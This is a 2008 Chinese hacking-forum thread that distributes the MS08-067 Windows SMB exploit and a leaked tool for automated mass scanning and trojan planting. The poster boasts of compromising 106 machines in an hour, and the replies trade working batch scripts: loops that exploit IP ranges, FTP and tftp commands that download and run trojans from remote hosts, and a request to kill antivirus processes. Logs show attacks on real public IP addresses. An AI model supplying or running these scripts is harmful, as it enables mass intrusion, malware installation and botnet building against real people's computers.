信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

看最近几天ms08067挺火的，借着这个火气，过来分享一下这个漏洞的利用方法和全自动利用工具。
首先说下EMM发的Exp，

ms08067.rar (3.02 KB)

ms08067.rar (3.02 KB)
下载次数: 3682

2008-10-30 04:01

使用方法非常简单，
cmd下直接运行MS08-067.exe IP即可。


若是提示：
SMB Connect OK!
Send Payload Over!
表明成功了。

2.jpg (72.72 KB)

2008-10-30 04:39

接着就可以通过4444端口连接了
Telnet XXX.XXX.XXX.XXX 4444

1.jpg (93.18 KB)

2008-10-30 04:39

若是提示：
SMB Connect OK!
RpcExceptionCode() = 1722
表明目标开了防火墙，溢出失败。


若是提示：
SMB Connect OK!
Maybe Patched!
表明目标已经打上补丁了。

3.jpg (72.58 KB)

2008-10-30 04:39

若是提示：
Make SMB Connection error:1203
表明目标没有开启Server、Workstation、Computer Browser其中的任何一种服务。


若是提示：
Make SMB Connection error:53
表明目标没开445端口或本地网络问题。

4.jpg (70.62 KB)

2008-10-30 04:39

在邪八主页改版和飘絮团队内部版发布之前，先发布一个大家最近都想要的ms08067全自动多IP段循环扫描传马工具。
这份东西作者今天刚写好，正在兴奋的卖着钱，却被我不小心发出来了，不小心，不小心。
晚上一拿到这个全自动的利用工具，挂在服务器上试用了下，效果的确不错，一个小时上了106台鸡。
不过，有一点很重要，本机要开 Server、Workstation、Computer Browser 这三个服务。

全自动ms08067.rar (24.85 KB)

全自动ms08067.rar (24.85 KB)
下载次数: 4759

2008-10-30 04:01

这个使用方法也非常简单，先配置好FTP文件，然后设置IP段，最后运行BAT文件就开始自动循环扫描传马了。
在2000和2003系统下运行win2K.bat,XP的系统运行XP.bat。
另外里面有详细的使用说明，大家自己摸一遍就会了。
请大家不要辜负了这个无辜的漏洞，和这份小小的礼物。 ：）晚安。

[ 本帖最后由 sinrre 于 2008-10-30 04:56 编辑 ]

记得要在exit后面加个回车<--记得,这个很重要


这儿是不是敲个回车键.

down2.txt文件的最后一行本来就有了回车，就不需要再敲一个了

我在韩文2K的系统上把文件传上去:ms067扫IPS文件.bat  这里的中文显示乱码,好象不能正常用啊.请楼上帮忙看下.

完成无法突出，是程序问题还是？我exit已经回车了。貌似是NC的问题

IP:2xx.xx.1xx.28 出现漏洞,正在尝试溢出上传......
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

D:\WINDOWS\system32>tftp -i xxxx.8800.org get xxx.exe
Transfer successful: 51856 bytes in 118 seconds, xxxxx bytes/s

D:\WINDOWS\system32>xxx.exe

D:\WINDOWS\system32>exit


然后就不动了, 唉

这个全自动的确实是有问题的，溢出成功后到

D:\WINDOWS\system32>tftp -i xxxx.8800.org get xxx.exe
Transfer successful: 51856 bytes in 118 seconds, xxxxx bytes/s

D:\WINDOWS\system32>xxx.exe

D:\WINDOWS\system32>exit

就不动了
我自己修改了一下

复制内容到剪贴板

代码:

@for /f "eol=S tokens=1 delims= " %%i in (s.txt) do @MS08-067 %%i|find /i "Send Payload Over!"|call start ftp.bat %%i&echo 发现溢出主机IP:%%i 准备溢出.....&@echo %%i >>成功主机.txt

把原来的 call xxx.bat  改为 call start xxx.bat  这样每一个溢出成功的机器都会打开一个新的cmd窗口来传马这样就不会影响批量了

给个建议
lz能不在bat里加个杀进程的东东，免得传上去的马被杀了。
能够杀诺顿的和江民的就可以了，貌似瑞星的和卡巴就不容易杀了。
下面的那位牛人能不能帮忙加下

EXIT你后面没加回车你让人家怎么给你动？你睁开你的眼看好！
我最 讨厌这些误导小朋友的坏蛋！

[ 本帖最后由 小拳头 于 2008-10-30 12:34 编辑 ]

我是菜鸟请问一下老鸟

echo open 你的FTP地址>xxx.xxx.xxx.xxx
echo FTP账号>>xxxxx
echo FTP密码>>xxxxx
echo binary>>(这里不知道填什么？)
echo get 你要下载的文件abc.exe>>(这里是木马的名称吗？)
echo bye>>(这里是木马的名称吗？)
ftp -s:(这里是木马的名称吗？)
abc.exe（那这里又是什么）
del (这里是木马的名称吗？)
abc.exe（那这里又是什么）
exit

exit 加回车难道我不知道嘛 ，我确实是加了，而且上面也有人出现过这个情况有回车但是到那边还是不能动，你自己没有出现这个情况并不代表没有，再说我怎么是误导人家了，确实是有人出现这个情况我才说的，你自己没有多测试有什么资格再这里说我！
有本事 你自己也修改修改 别张口给我要了！

echo open ftp地址>>Ghost.txt
echo 用户>>Ghost.txt
echo 密码>>Ghost.txt
echo binary>>Ghost.txt
echo get 1.exe c:\1.exe>>Ghost.txt
echo bye>>Ghost.txt
ftp -s:Ghost.txt
c:\1.exe
del Ghost.txt
exit













=======================
1.exe为木马名称  
菜鸟帮助菜鸟

这位朋友我说你误人子弟真的一点都不夸张，大家都知道exit是退出楼主用NC连接上去当然也可以用ctrl+c来结束掉NC用你的方法动不动就弹出新窗口上传，如果你扫的IP段够多的话你有没有想过你要开多少个黑窗？机器能受得了吗？你能控制好一次弹多少窗？我怕你没抓到肉鸡反而把自己的机器搞崩溃掉。

楼上的你回复的是什么呀

我是菜鸟请问一下老鸟

echo open 你的FTP地址>xxx.xxx.xxx.xxx
echo FTP账号>>xxxxx
echo FTP密码>>xxxxx
echo binary>>(这里不知道填什么？)
echo get 你要下载的文件abc.exe>>(这里是木马的名称吗？)
echo bye>>(这里是木马的名称吗？)
ftp -s:(这里是木马的名称吗？)
abc.exe（那这里又是什么）
del (这里是木马的名称吗？)
abc.exe（那这里又是什么）
exit

echo open xxx.xxx.xxx.xxx>cc1.dat
echo xxx>>cc1.dat
echo xxx>>cc1.dat
echo binary>>cc1.dat
echo get xxxexe>>cc1.dat
echo bye>>cc1.dat
ftp -s:cc1.dat
xxx.exe
del cc1.dat
xxx.exe
exit

这样应该 没错了吧

可以直接把 溢出程序里面的shellcode替换掉吗？
我仅仅是把shellcode部分替换成了自己的shellcode，不成功。不知道有没有其他的需要处理的。
不知道那位大哥替换成功了，不吝赐教~~

引用:

原帖由 小拳头 于 2008-10-30 13:38 发表
这位朋友我说你误人子弟真的一点都不夸张，大家都知道exit是退出楼主用NC连接上去当然也可以用ctrl+c来结束掉NC用你的方法动不动就弹出新窗口上传，如果你扫的IP段够多的话你有没有想过你要开多少个黑窗？机器能受得了吗？你 ...

加了回车也退出不了
新开的话窗口大部分会执行exit
奇怪

这样会把自己机器搞死的

哎还是用手动的吧，现在还没弄到FTP空间，测试了很过基本上出错的我的都出过，现在改进了下，先扫描开了445端口的

为什么我一个溢出也不成功，，出现下面的提示就没下文了！
（1：tftp工作正常，2：是125.64.114.1—— 125.64.255.255的ip难道这个多的ip，按照概率算约等于0吗）
发现溢出主机IP:222.218.71.180 准备溢出.....

IP:222.218.72.241 出现漏洞,正在尝试溢出上传......

发现溢出主机IP:222.218.72.241 准备溢出.....

IP:222.218.78.44 出现漏洞,正在尝试溢出上传......

发现溢出主机IP:222.218.78.44 准备溢出.....

IP:222.218.78.80 出现漏洞,正在尝试溢出上传......

发现溢出主机IP:222.218.78.80 准备溢出.....

IP:222.218.78.84 出现漏洞,正在尝试溢出上传......

C:\>ms08067 192.168.8.8

MS08-067 Exploit for CN by EMM@ph4nt0m.org

Make SMB Connection error:53

C:\>ms08067 192.168.8.189

MS08-067 Exploit for CN by EMM@ph4nt0m.org

SMB Connect OK!
Maybe Patched!

C:\>ms08067 192.168.8.231

MS08-067 Exploit for CN by EMM@ph4nt0m.org

^C
C:\>ms08067 192.168.8.250

MS08-067 Exploit for CN by EMM@ph4nt0m.org

SMB Connect OK!
Maybe Patched!

C:\>ms08067 192.168.8.108

MS08-067 Exploit for CN by EMM@ph4nt0m.org

SMB Connect OK!
Maybe Patched!

C:\>ms08067 192.168.8.18

MS08-067 Exploit for CN by EMM@ph4nt0m.org

SMB Connect OK!
Maybe Patched!

C:\>ms08067 192.168.8.15

MS08-067 Exploit for CN by EMM@ph4nt0m.org

SMB Connect OK!
Maybe Patched!

C:\>ms08067 192.168.8.9

MS08-067 Exploit for CN by EMM@ph4nt0m.org

SMB Connect OK!
RpcExceptionCode() = 1722

C:\>

echo binary>>cc1.dat、
不是吧？？还没改？

跟LS的差不多。提示溢出的时候没下文了。

挂VPN溢出可以不

就没人替换下 down and exec 的shellcode的啊，老是BAT，哎哎，搞脚本的终究比不了溢出的